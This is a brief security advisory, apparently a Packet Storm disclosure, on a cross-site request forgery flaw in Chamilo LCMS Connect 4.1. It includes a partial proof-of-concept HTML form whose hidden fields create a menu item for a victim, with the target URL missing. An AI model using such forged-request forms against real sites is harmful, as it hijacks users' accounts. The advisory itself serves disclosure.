Chamilo LCMS Connect 4.1 Cross Site Request Forgery

Type packetstorm
Reporter Vadodil Joel Varghese
Modified 2015-03-27T00:00:00


                                            `Hi Team,  
#Affected Vendor:  
#Date: 27/03/2015  
#Discovered by: Joel Vadodil Varghese  
#Type of vulnerability: XSRF  
#Tested on: Windows 7  
#Product: LCMS Connect  
#Version: 4.1  
#Description: Chamilo is an open-source (under GNU/GPL licensing)  
e-learning and content management system, aimed at improving access to  
education and knowledge globally. Chamilo LCMS is a completely new software  
platform for e-learning and collaboration. The application is vulnerable to  
XSRF attacks. If an attacker is able to lure a user into clicking a crafted  
link or by embedding such a link within web pages he could control the  
user's actions.  
#Proof of Concept (PoC):  
<form method="POST" name="form1" action="  
<input type="hidden" name="parent" value="0"/>  
<input type="hidden" name="title[de]" value=""/>  
<input type="hidden" name="title[en]" value="tester"/>  
<input type="hidden" name="title[fr]" value=""/>  
<input type="hidden" name="title[nl]" value=""/>  
<input type="hidden" name="application" value="weblcms"/>  
<input type="hidden" name="submit_button" value="Create"/>  
<input type="hidden" name="_qf__item" value=""/>  
<input type="hidden" name="type" value="core\menu\ApplicationItem"/>  
*Joel V*